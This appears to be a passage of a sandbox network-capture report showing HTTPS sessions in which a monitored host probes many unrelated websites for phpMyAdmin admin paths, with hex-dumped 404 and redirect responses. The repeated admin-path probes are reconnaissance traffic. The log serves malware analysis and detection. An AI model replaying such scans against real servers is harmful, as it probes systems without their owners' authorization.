                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC823INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC429INData Raw: 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ound:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                149192.168.2.663415104.21.60.188443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC166OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC964INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                                                                                Link: </styles/fonts/fa/fa-regular-400-min.woff2?_v=5.15.3.1706539464>; rel=preload; as=font; crossorigin=anonymous
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: xf_csrf=lPLfuRkR2S6NPnB3; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=So9eBhvQPmnTY%2FvHJyqcucVjEzI4S0UFqSkBnbhS0aaHICCEQAU47qDF4vfeM%2FEdxQfGTn7wiY409EtXauCGPyGOMjxa7ySTchg4ODd3oiSjmxzq2%2B0t20X8tSfbndA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5c795c6777-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC405INData Raw: 37 62 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 22 58 46 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 4c 54 52 22 20 64 61 74 61 2d 61 70 70 3d 22 70 75 62 6c 69 63 22 20 64 61 74 61 2d 74 65 6d 70 6c 61 74 65 3d 22 65 72 72 6f 72 22 20 64 61 74 61 2d 63 6f 6e 74 61 69 6e 65 72 2d 6b 65 79 20 64 61 74 61 2d 63 6f 6e 74 65 6e 74 2d 6b 65 79 20 64 61 74 61 2d 6c 6f 67 67 65 64 2d 69 6e 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 69 78 3d 22 78 66 5f 22 20 64 61 74 61 2d 63 73 72 66 3d 22 31 37 30 37 31 33 31 37 37 30 2c 66 36 35 35 66 31 35 38 38 64 39 39 62 36 61 61 35 38 62 32 31 64 34 30 66 65 65 36 34 37 63 65 22 20 64 61 74 61 2d 73 74 79 6c 65 2d 69 64 3d 22 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7beb<!DOCTYPE html><html id="XF" lang="en-US" dir="LTR" data-app="public" data-template="error" data-container-key data-content-key data-logged-in="false" data-cookie-prefix="xf_" data-csrf="1707131770,f655f1588d99b6aa58b21d40fee647ce" data-style-id="1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 57 65 20 72 61 6e 20 69 6e 74 6f 20 73 6f 6d 65 20 70 72 6f 62 6c 65 6d 73 2e 20 7c 20 50 69 6e 6f 79 20 54 65 63 68 20 46 6f 72 75 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d 22 2f 77 65 62 6d 61 6e 69 66 65 73 74 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 33 66 34 38 36 37 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tent="width=device-width, initial-scale=1, viewport-fit=cover"><title>Oops! We ran into some problems. | Pinoy Tech Forum</title><link rel="manifest" href="/webmanifest.php"><meta name="theme-color" content="#3f4867" /><meta name="apple-mobile-web-app
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 6d 65 5f 62 67 5f 70 69 63 6b 65 72 2e 6c 65 73 73 25 32 43 70 75 62 6c 69 63 25 33 41 78 65 6e 74 72 5f 74 6f 70 5f 73 65 63 74 69 6f 6e 2e 6c 65 73 73 25 32 43 70 75 62 6c 69 63 25 33 41 65 78 74 72 61 2e 6c 65 73 73 26 61 6d 70 3b 73 3d 31 37 26 61 6d 70 3b 6c 3d 31 26 61 6d 70 3b 64 3d 31 37 30 36 39 37 39 37 35 36 26 61 6d 70 3b 6b 3d 62 65 61 30 38 34 62 65 64 62 64 33 34 34 32 31 30 64 62 31 32 32 30 37 31 61 30 34 33 38 62 31 65 36 32 63 66 30 66 33 22 20 2f 3e 0a 3c 73 74 79 6c 65 3e 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 50 72 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 66 61 6c 7b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: me_bg_picker.less%2Cpublic%3Axentr_top_section.less%2Cpublic%3Aextra.less&amp;s=17&amp;l=1&amp;d=1706979756&amp;k=bea084bedbd344210db122071a0438b1e62cf0f3" /><style>@font-face{font-family:'Font Awesome 5 Pro';font-style:normal;font-weight:300}.fal{font-
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 35 30 30 3b 36 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 53 54 44
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: o/favicon.png" sizes="32x32" /><link href="https://fonts.googleapis.com/css?family=Open+Sans:wght@300;400;500;600&subset=latin,latin-ext&display=swap" rel="stylesheet" type="text/css"><script async src="https://www.googletagmanager.com/gtag/js?id=G-BSTD
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 2d 6c 61 62 65 6c 3d 22 42 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 20 70 69 63 6b 65 72 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 3e 0a 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 54 65 78 74 22 3e 42 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 20 70 69 63 6b 65 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 20 6d 65 6e 75 2d 2d 73 74 72 75 63 74 75 72 61 6c 20 6d 65 6e 75 2d 2d 6d 65 64 69 75 6d 22 20 64 61 74 61 2d 6d 65 6e 75 3d 22 6d 65 6e 75 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -label="Background color picker" aria-expanded="false" aria-haspopup="true"><i aria-hidden="true"></i><span class="p-navgroup-linkText">Background color picker</span></a><div class="menu menu--structural menu--medium" data-menu="menu" aria-hidden="tru
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 6e 65 77 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 57 68 61 74 26 23 30 33 39 3b 73 20 6e 65 77 22 20 74 69 74 6c 65 3d 22 57 68 61 74 26 23 30 33 39 3b 73 20 6e 65 77 22 3e 0a 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 54 65 78 74 22 3e 57 68 61 74 27 73 20 6e 65 77 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 73 65 61 72 63 68 2d 62 6f 64 79 22 20 69 64 3d 22 78 65 6e 74 72 53 65 61 72 63 68 22 3e 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 73 65 61 72 63 68 2f 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 73 65 61 72 63 68 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: new" aria-label="What&#039;s new" title="What&#039;s new"><i aria-hidden="true"></i><span class="p-navgroup-linkText">What's new</span></a><div class="p-search-body" id="xentrSearch"><form action="/search/search" method="post"><div class="p-search"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 78 66 54 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 31 37 30 37 31 33 31 37 37 30 2c 66 36 35 35 66 31 35 38 38 64 39 39 62 36 61 61 35 38 62 32 31 64 34 30 66 65 65 36 34 37 63 65 22 20 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 2f 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 6d 69 73 63 2f 73 74 79 6c 65 3f 73 74 79 6c 65 5f 69 64 3d 31 36 26 61 6d 70 3b 74 3d 31 37 30 37 31 33 31 37 37 30 25 32 43 66 36 35 35 66 31 35 38 38 64 39 39 62 36 61 61 35 38 62 32 31 64 34 30 66 65 65 36 34 37 63 65 22 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 20 74 68 65 6d 65 2d 73 77 69 74 63 68 65 72 22 20 64 61 74 61 2d 78 66 2d 69 6e 69 74 3d 22 74 6f 6f 6c 74 69 70 22 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <input type="hidden" name="_xfToken" value="1707131770,f655f1588d99b6aa58b21d40fee647ce" /></form></div><a href="/misc/style?style_id=16&amp;t=1707131770%2Cf655f1588d99b6aa58b21d40fee647ce" class="p-navgroup-link theme-switcher" data-xf-init="tooltip"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 75 2d 73 6d 61 6c 6c 65 72 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 61 62 65 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 47 72 6f 75 70 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 47 72 6f 75 70 2d 74 65 78 74 22 20 69 64 3d 22 63 74 72 6c 5f 73 65 61 72 63 68 5f 6d 65 6e 75 5f 62 79 5f 6d 65 6d 62 65 72 22 3e 42 79 3a 3c 2f 73 70 61 6e 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 6e 61 6d 65 3d 22 63 5b 75 73 65 72 73 5d 22 20 64 61 74 61 2d 78 66 2d 69 6e 69 74 3d 22 61 75 74 6f 2d 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u-smaller" aria-hidden="true"></i></span></span></label></div><div class="menu-row"><div class="inputGroup"><span class="inputGroup-text" id="ctrl_search_menu_by_member">By:</span><input type="text" class="input" name="c[users]" data-xf-init="auto-c
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 74 68 5f 68 6f 6c 69 64 61 79 5f 5f 63 61 74 65 67 6f 72 79 53 74 72 69 70 5f 5f 72 69 67 68 74 22 3e 3c 2f 64 69 76 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 2d 70 6c 61 69 6e 20 70 2d 6e 61 76 2d 6d 65 6e 75 54 72 69 67 67 65 72 20 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 78 66 2d 63 6c 69 63 6b 3d 22 6f 66 66 2d 63 61 6e 76 61 73 22 20 64 61 74 61 2d 6d 65 6e 75 3d 22 2e 6a 73 2d 68 65 61 64 65 72 4f 66 66 43 61 6e 76 61 73 4d 65 6e 75 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4d 65 6e 75 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 74 65 78 74 22 3e 0a 3c 69 20 61 72 69 61 2d 68 69 64 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div class="th_holiday__categoryStrip__right"></div><button type="button" class="button--plain p-nav-menuTrigger button" data-xf-click="off-canvas" data-menu=".js-headerOffCanvasMenu" tabindex="0" aria-label="Menu"><span class="button-text"><i aria-hidde
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 3e 53 65 61 72 63 68 20 66 6f 72 75 6d 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 45 6c 20 22 20 64 61 74 61 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 3d 22 74 72 75 65 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 77 68 61 74 73 2d 6e 65 77 2f 22 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 45 6c 2d 6c 69 6e 6b 20 70 2d 6e 61 76 45 6c 2d 6c 69 6e 6b 2d 2d 73 70 6c 69 74 4d 65 6e 75 20 22 20 64 61 74 61 2d 6e 61 76 2d 69 64 3d 22 77 68 61 74 73 4e 65 77 22 3e 57 68 61 74 27 73 20 6e 65 77 3c 2f 61 3e 0a 3c 61 20 64 61 74 61 2d 78 66 2d 6b 65 79 3d 22 33 22 20 64 61 74 61 2d 78 66 2d 63 6c 69 63 6b 3d 22 6d 65 6e 75 22 20 64 61 74 61 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: >Search forums</a></div></div></div></li><li><div class="p-navEl " data-has-children="true"><a href="/whats-new/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="whatsNew">What's new</a><a data-xf-key="3" data-xf-click="menu" data-menu-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                150192.168.2.66347631.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC177OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC640INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_l=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_n=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpMyAdmin/?_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: I3zxow2EyYiT4/8M661Eao8XHJAFZ0qM1l542FKnztidvedUaMHsYTTLOrvL5G13tTDBSpQ2DpZZv6c7GJMx/A==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                151192.168.2.66373182.221.28.171443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC166OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC256INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.uh.is/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                152192.168.2.663154172.66.40.88443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1366INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: warriorplus=t7m7koebbgrclahjoueq2ppgn6; expires=Wed, 06-Mar-2024 11:16:10 GMT; Max-Age=2592000; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: rqtok=2bcfb037a5cc912bf4b2; expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/
